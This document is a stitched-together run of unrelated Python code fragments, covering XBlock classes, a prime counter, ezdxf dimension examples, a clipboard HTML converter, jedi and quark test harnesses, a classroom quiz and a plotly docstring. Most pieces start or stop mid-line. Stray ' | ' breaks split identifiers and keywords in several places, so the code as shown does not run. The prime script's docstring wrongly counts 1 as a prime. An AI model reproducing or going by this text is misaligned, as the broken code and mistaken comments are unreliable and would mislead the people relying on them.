(e.g. on startup or first page load), and in what
contexts. Hence, the flag.
"""
# Allow this method to access the `_class_tags`
# pylint: disable=W0212
for name, class_ in cls.load_classes(fail_silently):
if tag in class_._class_tags:
yield name, class_
def __init__(self, runtime, field_data=None, scope_ids=UNSET, *args, **kwargs):
"""
Construct a new XBlock.
This class should only be instantiated by runtimes.
Arguments:
runtime (:class:`.Runtime`): Use it to access the environment.
It is available in XBlock code as ``self.runtime``.
field_data (:class:`.FieldData`): Interface used by the XBlock
fields to access their data from wherever it is persisted.
Deprecated.
scope_ids (:class:`.ScopeIds`): Identifiers needed to resolve
scopes.
"""
if scope_ids is UNSET:
raise TypeError('scope_ids are required')
# Provide backwards compatibility for external access through _field_data
super(XBlock, self).__init__(runtime=runtime, scope_ids=scope_ids, field_data=field_data, *args, **kwargs)
def render(self, view, context=None):
"""Render `view` with this block's runtime and the supplied `context`"""
return self.runtime.render(self, view, context)
def validate(self):
"""
Ask this xblock to validate itself. Subclasses are expected to override this
method, as there is currently only a no-op implementation. Any overriding method
should call super to collect validation results from its superclasses, and then
add any additional results as necessary.
"""
return Validation(self.scope_ids.usage_id)
class XBlockAside(XmlSerializationMixin, ScopedStorageMixin, RuntimeServicesMixin, HandlersMixin, SharedBlockBase):
"""
This mixin allows Xblock-like class to declare that it provides aside functionality.
"""
entry_point = "xblock_asides.v1"
@classmethod
def aside_for(cls, view_name):
"""
A decorator to indicate a function is the aside view for the given view_name.
Aside views should have a signature like:
@XBlockAside.aside_for('student_view')
def student_aside(self, block, context=None):
...
return Fragment(...)
"""
# pylint: disable=protected-access
def _decorator(func): # pylint: disable=missing-docstring
if not hasattr(func, '_aside_for'):
func._aside_for = []
func._aside_for.append(view_name) # pylint: disable=protected-access
return func
return _decorator
@class_lazy
def _combined_asides(cls): # pylint: disable=no-self-argument
"""
A dictionary mapping XBlock view names to the aside method that
decorates them (or None, if there is no decorator for the specified view).
"""
# The method declares what views it decorates. We rely on `dir`
# to handle subclasses and overrides.
combined_asides = defaultdict(None)
for _view_name, view_func in inspect.getmembers(cls, lambda attr: hasattr(attr, '_aside_for')):
aside_for = getattr(view_func, '_aside_for', [])
for view in aside_for:
combined_asides[view] = view_func.__name__
return combined_asides
def aside_view_declaration(self, view_name):
"""
Find and return a function object if one is an aside_view for the given view_name
Aside methods declare their view provision via @XBlockAside.aside_for(view_name)
This function finds those declarations for a block.
Arguments:
view_name (string): the name of the view requested.
|
"""
For any given number, we only need to test the primes below it.
e.g. 9 -- we need only test 1,2,3,5,7
e.g. 8 -- we need only test 1,2,3,5,7
for example, the number 12 has factors 1,2,3 | ,6,12.
We could find the six factor but we will find the two factor first.
The definition of a composite number is that it is composed of primes, therefore it will always have a prime as a factor.
This prime test should have an index of all primes below i.
"""
total_range = 1000000
primes = list()
def prime_test(i):
"""
Cases:
Return False if i is not prime
Return True if | i is prime
Caveat: cannot test 1.
Caveat 2: Cannot test 2.
It is fortuitous that these tests both return true.
"""
for possible_factor in primes:
if i % possible_factor == 0:
return False
return True
for prime in range(2,total_range):
is_prime = prime_test(prime)
if is_prime:
primes.append(prime)
print len(primes)
|
# encoding: utf-8
# module gio._gio
# from /usr/lib/python2.7/dist-packages/gtk-2.0/gio/_gio.so
# by generator 1.135
# no doc
# imports
import gio as __gio
import glib as __glib
import gobject as __gobject
import gobject._gobject as __gobject__gobject
| class FileMonitorEvent(__gobject.GEnum):
# no doc
def __init__(self, *args, **kwargs): # real signatur | e unknown
pass
__weakref__ = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""list of weak references to the object (if defined)"""
__dict__ = None # (!) real value is ''
__enum_values__ = {
0: 0,
1: 1,
2: 2,
3: 3,
4: 4,
5: 5,
6: 6,
7: 7,
}
__gtype__ = None # (!) real value is ''
|
ert += (0.2, 0)
attribs = dict(TEXT_ATTRIBS)
line_space = 0.4
delta = Vec3(0, line_space, 0)
for line in lines:
text = msp.add_text(line, dxfattribs=attribs).set_pos(insert)
if ucs:
text.transform(ucs.matrix)
insert -= delta
msp = doc.modelspace()
setup_dimstyle(
doc,
name="TICK",
fmt="EZ_M_100_H25_CM",
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="ARCHTICK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.architectural_tick,
style=DIM_TEXT_STYLE,
)
setup_dimstyle(
doc,
name="CLOSEDBLANK",
fmt="EZ_M_100_H25_CM",
blk=ezdxf.ARROWS.closed_blank,
style=DIM_TEXT_STYLE,
)
def text(dimstyle, x, y, halign, valign, oblique=0):
"""Default dimension text placing
Args:
dimstyle: dimstyle to use
x: start point x
y: start point y
halign: horizontal text alignment - "left", "right", "center",
"above1", "above2", requires DXF R2000+
valign: vertical text alignment "above", "center", "below"
oblique: angle of oblique extension line, 0 = orthogonal to
dimension line
"""
dimattr = {}
if oblique:
dimattr["oblique_angle"] = oblique
base = (x, y + 2)
# wide
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 5, y),
dimstyle=dimstyle,
dxfattribs=dimattr,
)
dim.set_text_align(halign=halign, valign=valign)
dim.render(ucs=ucs, discard=BRICSCAD)
add_text(
[f"halign={halign}", f"valign={valign}", f"oblique={oblique}"],
insert=Vec3(x, y),
)
# narrow
dim = msp.add_linear_dim(
base=base,
p1=(x + 7, y),
p2=(x + 7.3, y),
dimstyle=dimstyle,
dxfattribs=dimattr,
)
dim.set_text_align(halign=halign, valign=valign)
dim.render(ucs=ucs, discard=BRICSCAD)
# arrows inside, text outside
dim = msp.add_linear_dim(
base=base,
p1=(x + 10, y),
p2=(x + 10.9999, y),
dimstyle=dimstyle,
override={"dimdec": 2},
dxfattribs=dimattr,
)
dim.set_text_align(halign=halign, valign=valign)
dim.render(ucs=ucs, discard=BRICSCAD)
# narrow and force text inside
dim = msp.add_linear_dim(
base=base,
p1=(x + 14, y),
p2=(x + 14.3, y),
dimstyle=dimstyle,
override={"dimtix": 1},
dxfattribs=dimattr,
)
dim.set_text_align(halign=halign, valign=valign)
dim.render(ucs=ucs, discard=BRICSCAD)
def user_text_free(dimstyle, x=0, y=0, leader=False):
"""User defined dimension text placing.
Args:
dimstyle: dimstyle to use
x: start point x
y: start point y
leader: use leader line if True
"""
override = {
"dimdle": 0.0,
"dimexe": 0.5, # length of extension line above dimension line
"dimexo": 0.5, # extension line offset
"dimtfill": 2, # custom text fill
"dimtfillclr": 4, # cyan
}
base = (x, y + 2)
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 3, y),
dimstyle=dimstyle,
override=override,
)
location = Vec3(x + 3, y + 3, 0)
dim.set_location(location, leader=leader)
dim.render(ucs=ucs, discard=BRICSCAD)
add_text(
[f"usr absolute={location}", f"leader={leader}"], insert=Vec3(x, y)
)
x += 4
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 3, y),
dimstyle=dimstyle,
override=override,
)
relative = Vec3(-1, +1) # relative to dimline center
dim.set_location(relative, leader=leader, relative=True)
dim.render(ucs=ucs, discard=BRICSCAD)
add_text(
[f"usr relative={relative}", f"leader={leader}"], insert=Vec3(x, y)
)
x += 4
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 3, y),
dimstyle=dimstyle,
override=override,
)
dh = -0.7
dv = 1.5
dim.shift_text(dh, dv)
dim.render(ucs=ucs, discard=BRICSCAD)
add_text(
[
f"shift text=({dh}, {dv})",
],
insert=Vec3(x, y),
)
override["dimtix"] = 1 # force text inside
x += 4
dim = msp.add_linear_dim(
base=base,
p1=(x, y),
p2=(x + 0.3, y),
dimstyle=dimstyle,
override=override,
)
dh = 0
dv = 1
dim.shift_text(dh, dv)
dim.render(ucs=ucs, discard=BRICSCAD)
add_text(
[
f"shift text=({dh}, {dv})",
],
insert=Vec3(x, y),
)
dimstyles = ["TICK", "ARCHTICK", "CLOSEDBLANK"]
xoffset = 17
yoffset = 5
for col, dimstyle in enumerate(dimstyles):
row = 0
for halign in ("center", "left", "right"):
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="above",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="center",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign=halign,
valign="below",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="above1",
valign="above",
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="above2",
valign="above",
)
row += 1
user_text_free(dimstyle, x=col * xoffset, y=row * yoffset)
row += 1
user_text_free(dimstyle, x=col * xoffset, y=row * yoffset, leader=True)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * yoffset,
halign="center",
valign="above",
oblique=70,
)
row += 1
text(
dimstyle,
x=col * xoffset,
y=row * | yoffset,
halign="above1",
valign="above",
oblique=80,
)
row += 1
doc.saveas(OUTDIR / filename)
def example_multi_point_linear_dimension():
"""Example for using the ezdxf "multi-point linear dimension" feature, which
generates dimension entities for multiple points at ones and tries to move
dimension text to a readabl | e location.
This feature works best with DXF R2007+.
"""
doc = ezdxf.new("R2007", setup=True)
msp = doc.modelspace()
points = [(0, 0), (5, 1), (5.2, 1), (5.4, 0), (7, 0), (10, 3)]
msp.add_lwpolyline(points)
# create quick a new DIMSTYLE as alternative to overriding DIMSTYLE attributes
dimstyle = cast(
DimStyle, doc.dimstyles.duplicate_entry("EZDXF", "WITHTFILL")
)
dimstyle.dxf.dimtfill = 1
msp.add_multi_point_linear_dim(
base=(0, 5), points=points, dimstyle="WITHTFILL"
)
doc.saveas(OUTDIR / f"multi_point_linear_dim_R2007.dxf")
def random_point(start, end):
dist = end - start
return Vec3(start + random.random() * dist, start + random.random() * dist)
def example_random_multi_point_linear_dimension(
count=10, length=20, dis |
# -*- coding | : utf-8 -*-
from openerp import models, fields, api
class StockPicking(models.Model):
_inherit = 'stock.picking'
deliver = fields. | Char(string="Deliver at")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Module containing methods for comment preprocessing (cleaning) """
class Comment(object):
"""
Comment Entity.
Besides getters and setters it handlers simple preprocessing methods
"""
def __init__(self, comment_string):
self._comment = comment_string
self._author = None
self._gender = None
self._male_likes = 0
self._female_likes = 0
@property
def comment(self):
return self._comment
@comment.setter
def comment(self, value):
self._comment = value
@property
def author(self):
return self._author
@author.setter
def author(self, value):
self._author = value
@property
def gender(self):
return self._gender
@gender.setter
def gender(self, value):
self._gender = value
@property
def male_likes( | self):
return self._male_likes
@male_likes.setter
def male_likes(self, value):
self._male_likes = value
@property
def female_likes(self):
return self._female_likes
@female_likes.setter
def femal | e_likes(self, value):
self._female_likes = value
@property
def likes(self):
""" Returns the calculated sum of male and female likes """
return self._male_likes + self._female_likes
@property
def likes_ratio(self):
""" Returns the male ratio """
if self.likes > 0:
return float(self.male_likes) / float(self.likes)
else:
return 0.0
def __str__(self):
return '%s' % self._comment
def lower_comment(self):
self._comment = self._comment.lower()
|
ion.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
The Win32 clipboard uses a special format for handling HTML. The basic
problem that the special format is trying to solve is that the user can
select an arbitrary chunk of formatted text that might not be valid HTML.
For instance selecting half-way through a bolded word would contain no </b>
tag. The solution is to encase the fragment in a valid HTML document.
You can read more about this at:
http://msdn.microsoft.com/workshop/networking/clipboard/htmlclipboard.asp
This module deals with converting between the clipboard HTML format and
standard HTML format.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import re
# ----------------------------------------------------------------------------
# Private Functions
# ----------------------------------------------------------------------------
def _findFirst( pattern, src ):
"""
A helper function that simplifies the logic of using regex to find
the first match in a string.
"""
results = re.findall( pattern, src )
if len(results) > 0:
return results[0]
return None
# ----------------------------------------------------------------------------
# HtmlClipboardFormat Object
# ----------------------------------------------------------------------------
class HtmlClipboardFormat:
"""
Encapsulates the conversation between the clipboard HTML
format and standard HTML format.
"""
# The 1.0 HTML clipboard header format.
HEADER_FORMAT = \
"Version:1.0\r\n" \
"StartHTML:%(htmlStart)09d\r\n" \
"EndHTML:%(htmlEnd)09d\r\n" \
"StartFragment:%(fragmentStart)09d\r\n" \
"EndFragment:%(fragmentEnd)09d\r\n" \
"StartSelection:%(fragmentStart)09d\r\n" \
"EndSelection:%(fragmentEnd)09d\r\n" \
"SourceURL:Enso\r\n"
# A generic HTML page.
HTML_PAGE = \
"<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n" \
"<html>\n<head><title></title></head>\n" \
"<body>%s</body>\n" \
"</html>"
# These regexps find the character offsets of the fragment strings (see
# below) from the HTML clipboard format header.
START_RE = "StartFragment:(\d+)"
END_RE = "EndFragment:(\d+)"
# The Clipboard HTML format uses the following comment strings to mark
# the beginning and end of the text fragment which represents the user's
# actual s | election; everything else is envelope.
START_FRAG = "<!-- StartFragment -->"
END_FRAG = "<!-- EndFragment -->"
def __init__( self, html ):
"""
Initializes the class to repres | ent html.
"""
# Preconditions:
assert( type( html ) == unicode )
# The internal storage format is platonic unicode.
self.html = html
@classmethod
def fromClipboardHtml( cls, clipboardHtml ):
"""
Instantiates the class given a string containing the Win32 Html
Clipboard format. The given clipboardHtml is expected to be in
utf-8 and is expected to contain the special start-fragment and
end-fragment markers as defined in the class constants. If it's
not utf-8 or if it doesn't have the right delimiters, this function
logs a warning message and creates an instance empty of text.
"""
# Preconditions:
assert( type( clipboardHtml ) == str )
try:
html = clipboardHtml.decode( "utf-8" )
except UnicodeDecodeError:
# input can't be decoded from utf-8:
logging.warn( "Non-Utf-8 string in fromClipboardHtml." )
return cls( u"" )
start = _findFirst( cls.START_RE, clipboardHtml )
end = _findFirst( cls.END_RE, clipboardHtml )
if start and end:
html = clipboardHtml[ int(start): int(end) ]
html = html.decode( "utf-8" )
return cls( html )
else:
# Start and end not found in input:
logging.warn( "Missing delimiters in fromClipboardHtml." )
return cls( u"" )
@classmethod
def fromHtml( cls, html ):
"""
Instantiates the class given a string containing plain Html.
"""
# Preconditions:
assert( isinstance( html, unicode ) )
return cls( html )
def toClipboardHtml( self ):
"""
Returns the contents in the Win32 Html format.
"""
return self._encodeHtmlFragment( self.html )
def toHtml( self ):
"""
Returns the contents in the plain Html format.
"""
return self.html
def _createHtmlPage( self, fragment ):
"""
Takes an Html fragment and encloses it in a full Html page.
"""
return self.HTML_PAGE % fragment
def _encodeHtmlFragment(self, sourceHtml):
"""
Join all our bits of information into a string formatted as per the
clipboard HTML format spec.
The return value of this function is a Python string
encoded in UTF-8.
"""
# Preconditions:
assert( type( sourceHtml ) == unicode )
# LONGTERM TODO: The above contract statement involving
# .encode().decode() could have damaging performance
# repercussions.
# NOTE: Every time we construct a string, we must encode it to
# UTF-8 *before* we do any position-sensitive operations on
# it, such as taking its length or finding a substring
# position.
if "<body>" in sourceHtml:
htmlheader, fragment = sourceHtml.split( "<body>" )
fragment, footer = fragment.split( "</body>" )
htmlheader = htmlheader + "<body>"
footer = "</body>" + footer
fragment = "".join( [self.START_FRAG,
fragment,
self.END_FRAG] )
html = "".join([ htmlheader, fragment, footer ])
else:
fragment = sourceHtml
html = self._createHtmlPage( fragment )
fragment = fragment.encode( "utf-8" )
html = html.encode( "utf-8" )
assert html == html.decode( "utf-8" ).encode( "utf-8" ), \
"Encoding got out of whack in HtmlClipboardFormat."
# How long is the header going to be?
dummyHeader = self.HEADER_FORMAT % dict( htmlStart = 0,
htmlEnd = 0,
fragmentStart = 0,
fragmentEnd = 0 )
dummyHeader = dummyHeader.encode( "utf-8" )
headerLen = len(dummyHeader)
fragmentStart = html.find( fragment )
fragmentEnd = fragmentStart + len( fragment )
positions = dict( htmlStart = headerLen,
htmlEnd = headerLen + len(html),
fragmentStart = headerLen + fragmentStart,
fragmentEnd = headerLen + fragmentEnd )
|
Usages
++++++
Tests look like this::
abc = 1
#< abc@1,0 abc@3,0
abc
"""
import os
import re
import sys
import operator
from ast import literal_eval
from io import StringIO
from functools import reduce
import jedi
from jedi._compatibility import unicode, is_py3
from jedi.parser import Parser, load_grammar
from jedi.api.classes import Definition
TEST_COMPLETIONS = 0
TEST_DEFINITIONS = 1
TEST_ASSIGNMENTS = 2
TEST_USAGES = 3
class IntegrationTestCase(object):
def __init__(self, test_type, correct, line_nr, column, start, line,
path=None, skip=None):
self.test_type = test_type
self.correct = correct
self.line_nr = line_nr
self.column = column
self.start = start
self.line = line
self.path = path
self.skip = skip
@property
def module_name(self):
return os.path.splitext(os.path.basename(self.path))[0]
@property
def line_nr_test(self):
"""The test is always defined on the line before."""
return self.line_nr - 1
def __repr__(self):
return '<%s: %s:%s:%s>' % (self.__class__.__name__, self.module_name,
self.line_nr_test, self.line.rstrip())
def script(self):
return jedi.Script(self.source, self.line_nr, self.column, self.path)
def run(self, compare_cb):
testers = {
TEST_COMPLETIONS: self.run_completion,
TEST_DEFINITIONS: self.run_goto_definitions,
TEST_ASSIGNMENTS: self.run_goto_assignments,
TEST_USAGES: self.run_usages,
}
return testers[self.test_type](compare_cb)
def run_completion(self, compare_cb):
completions = self.script().completions()
#import cProfile; cProfile.run('script.completions()')
comp_str = set([c.name for c in completions])
return compare_cb(self, comp_str, set(literal_eval(self.correct)))
def run_goto_definitions(self, compare_cb):
script = self.script()
evaluator = script._evaluator
def comparison(definition):
suffix = '()' if definition.type == 'instance' else ''
return definition.desc_with_module + suffix
def definition(correct, correct_start, path):
should_be = set()
for match in re.finditer('(?:[^ ]+)', correct):
string = match.group(0)
parser = Parser(load_grammar(), string, start_symbol='eval_input')
parser.position_modifier.line = self.line_nr
element = parser.get_parsed_node()
element.parent = jedi.api.completion.get_user_scope(
script._get_module(),
(self.line_nr, s | elf.column)
)
results = evaluator.eval_element(element)
if not results:
raise Exception('Could not resolve %s on line %s'
% (match.string, self.line_nr - 1))
| should_be |= set(Definition(evaluator, r) for r in results)
# Because the objects have different ids, `repr`, then compare.
should = set(comparison(r) for r in should_be)
return should
should = definition(self.correct, self.start, script.path)
result = script.goto_definitions()
is_str = set(comparison(r) for r in result)
return compare_cb(self, is_str, should)
def run_goto_assignments(self, compare_cb):
result = self.script().goto_assignments()
comp_str = str(sorted(str(r.description) for r in result))
return compare_cb(self, comp_str, self.correct)
def run_usages(self, compare_cb):
result = self.script().usages()
self.correct = self.correct.strip()
compare = sorted((r.module_name, r.line, r.column) for r in result)
wanted = []
if not self.correct:
positions = []
else:
positions = literal_eval(self.correct)
for pos_tup in positions:
if type(pos_tup[0]) == str:
# this means that there is a module specified
wanted.append(pos_tup)
else:
line = pos_tup[0]
if pos_tup[0] is not None:
line += self.line_nr
wanted.append((self.module_name, line, pos_tup[1]))
return compare_cb(self, compare, sorted(wanted))
def skip_python_version(line):
comp_map = {
'==': 'eq',
'<=': 'le',
'>=': 'ge',
'<': 'gk',
'>': 'lt',
}
# check for python minimal version number
match = re.match(r" *# *python *([<>]=?|==) *(\d+(?:\.\d+)?)$", line)
if match:
minimal_python_version = tuple(
map(int, match.group(2).split(".")))
operation = getattr(operator, comp_map[match.group(1)])
if not operation(sys.version_info, minimal_python_version):
return "Minimal python version %s %s" % (match.group(1), match.group(2))
return None
def collect_file_tests(path, lines, lines_to_execute):
def makecase(t):
return IntegrationTestCase(t, correct, line_nr, column,
start, line, path=path, skip=skip)
start = None
correct = None
test_type = None
skip = None
for line_nr, line in enumerate(lines, 1):
if correct is not None:
r = re.match('^(\d+)\s*(.*)$', correct)
if r:
column = int(r.group(1))
correct = r.group(2)
start += r.regs[2][0] # second group, start index
else:
column = len(line) - 1 # -1 for the \n
if test_type == '!':
yield makecase(TEST_ASSIGNMENTS)
elif test_type == '<':
yield makecase(TEST_USAGES)
elif correct.startswith('['):
yield makecase(TEST_COMPLETIONS)
else:
yield makecase(TEST_DEFINITIONS)
correct = None
else:
skip = skip or skip_python_version(line)
try:
r = re.search(r'(?:^|(?<=\s))#([?!<])\s*([^\n]*)', line)
# test_type is ? for completion and ! for goto_assignments
test_type = r.group(1)
correct = r.group(2)
# Quick hack to make everything work (not quite a bloody unicorn hack though).
if correct == '':
correct = ' '
start = r.start()
except AttributeError:
correct = None
else:
# Skip the test, if this is not specified test.
for l in lines_to_execute:
if isinstance(l, tuple) and l[0] <= line_nr <= l[1] \
or line_nr == l:
break
else:
if lines_to_execute:
correct = None
def collect_dir_tests(base_dir, test_files, check_thirdparty=False):
for f_name in os.listdir(base_dir):
files_to_execute = [a for a in test_files.items() if f_name.startswith(a[0])]
lines_to_execute = reduce(lambda x, y: x + y[1], files_to_execute, [])
if f_name.endswith(".py") and (not test_files or files_to_execute):
skip = None
if check_thirdparty:
lib = f_name.replace('_.py', '')
try:
# there is always an underline at the end.
# It looks like: completion/thirdparty/pylab_.py
__import__(lib)
except ImportError:
skip = 'Thirdparty-Library %s not found.' % lib
path = os.path.join(base_dir, f_name)
if is_py3:
source = open(path, encoding='utf-8').read()
else:
source = unicode(open(path).read(), 'UTF-8')
for case in collect_file_tests(path, StringIO(source),
lines_to_execute):
case.source = source
if skip:
|
# Copyright 2015 datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, pytest
from quarkc.compiler import Compiler
from .util import assert_file, maybe_xfail, is_excluded_file
directory = os.path.join(os.path.dirname(__file__), "parse")
files = [name for name in os.listdir(directory) if name.endswith(".q")]
paths = [os.path.join(directory, name) for name in files]
@pytest.fixture(params=paths)
def path(request):
return request.param
def test_parse(path):
parse(path, is_excluded_file)
def test_parse_builtin():
parse(os.path.join(directory, "empty-file.q"), lambda x: False)
def parse(path, file_filter):
dir = os.path.dirname(path)
text = open(path).read()
maybe_xfail(text)
c = Compiler()
c.urlparse(path, recurse=False)
for ast in c.roots[path].files:
if file_filter(ast.filename): continue
base = os.path.splitext(ast.filename)[0]
assert_file(os.path.join(dir, base + ".ast"), ast.pprint())
code = ast.code()
assert_file(os.path.join(dir, base + ".code"), code)
rtc = Compiler()
rtc.urlparse(base + ".code", | recurse=False)
for f in rtc.roots[base + ".code"].files:
if f.name == base + ".code":
assert f.code() == code |
break
else:
assert False
|
income = 15000
if income < 10000:
taxCoefficient = 0.0
eli | f income < 30000:
taxCoefficient = 0.2
elif income < 100000:
taxCoefficient = 0.35
else:
taxCoefficient = 0.45
print("Need to pay: ", income * taxCoefficient, "in taxes")
flag = False
if flag:
print("a")
print("b")
if flag:
print("c")
pr | int("d")
orderAmount = 300
discount = 25 if orderAmount > 100 else 0
print(discount) |
# Teacher Quiz - Python Code - Elizabeth Tweedale
import csv, random
def askName(): # askName function returns the name of the student
print("Welcome to the Super Python Quiz!")
yourName = input("What is your name? ")
print ("Hello",str(yourName))
return yourName
def getQuestions(): # getQuestions reads in the questions from a CSV file
questions = [] # this creates an empty list for adding the questions to
with open("SuperPythonQuiz.csv", mode="r", encoding="utf-8") as myFile:
myQuiz = csv.reader(myFile)
for row in myQuiz:
questions.append(row)
return questions
def askQuestion(question,score): # askQuestion prints the question and choices to the screen then checks the answer
print(question[0]) # print the question - this is in the [0] position of the row
for eachChoice in question[1:-1]: # print each choice from [1] to the last position [-1]
print("{0:>5}{1}".format("", eachChoice))
answer = input("Please select an answer: ") # get the student's answer
if answer == question[-1]: # check if the answer matches the last position in the question, the correct answer
print("Correct!") # if it's correct, tell the user and add one to the score
score += 1
else: # if it's incorrect, tell the user what the correct answer was
print("Incorrect, the correct answer was {0}.".format(question[-1]))
return score # return the score
def recordScore(studentName, score):
with open("QuizResults.txt", mode="a+",encoding="utf-8") as myFile: | # note the '+' sign after the a means if the file does not exist, then create it
myFile.write(str(studentName) + "," + str(score) + "\n") # write name,score to the file
# "\n" will add a new line to the file so that it's ready for the next name
def main():
studentName = askName() | # call the askName function
questions = getQuestions() # call the getQuestions function
score = 0 # initialise the score to 0
number = len(questions) # use the number to keep track of the total number of questions - which is the length of the 'questions' list
for eachQuestion in range(number): # reppeat for each question
question = random.choice(questions) # choose a random question from the questions list
score = askQuestion(question,score) # ask the question and update the score
questions.remove(question) # remove the current question from the list so that you don't ask it again
print("Your final score is:", score, "out of:", number) # tell the user what their final score is
recordScore(studentName, score) # call the recordScore function
main()
|
o the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
color=None,
coloraxis=None,
colorscale=None,
colorsrc=None,
reversescale=None,
width=None,
**kwargs
):
"""
Construct a new Line object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.scatter3d.marker.Line`
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.line.colorscale`. Has an effect only if in
`marker.line.color`is set to a numerical array. In case
`colorscale` is unspecified or `autocolorscale` is
true, the default palette will be chosen according to
whether numbers in the `color` array are all positive,
all negative or mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here in
`marker.line.color`) or the bounds set in
`marker.line.cmin` and `marker.line.cmax` Has an
effect only if in `marker.line.color`is set to a
numerical array. Defaults to `false` when
`marker.line.cmin` and `marker.line.cmax` are set by
the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmin` must
be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.line.cmin` and/or `marker.line.cmax` to be
equidistant to this point. Has an effect only if in
`marker.line.color`is set to a numerical array. Value
should have the same units as in `marker.line.color`.
Has no effect when `marker.line.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if in `marker.line.color`is set to a numerical
array. Value should have the same units as in
`marker.line.color` and if set, `marker.line.cmax` must
be set as well.
color
Sets themarker.linecolor. It accepts either a specific
color or an array of numbers that are mapped to the
colorscale relative to the max and min values of the
array or relative to `marker.line.cmin` and
`marker.line.cmax` if set.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorscale
Sets the colorscale. Has an effect only if in
`marker.line.color`is set to a numerical array. The
colorscale must be an array containing arrays mapping a
normalized value to an rgb, rgba, hex, hsl, hsv, or
named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For
example, `[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`.
To control the bounds of the colorscale in color space,
use`marker.line.cmin` and `marker.line.cmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
colorsrc
Sets the source reference on Chart Studio Cloud for
`color`.
reversescale
Reverses the color mapping if true. Has an effect only
if in `marker.line.color`is set to a numerical array.
If true, `marker.line.cmin` will correspond to the last
color in the array and `marker.line.cmax` will
correspond to the first color.
width
Sets the width (in px) of the lines bounding the marker
points.
Returns
-------
Line
"""
super(Line, self).__init__("line")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
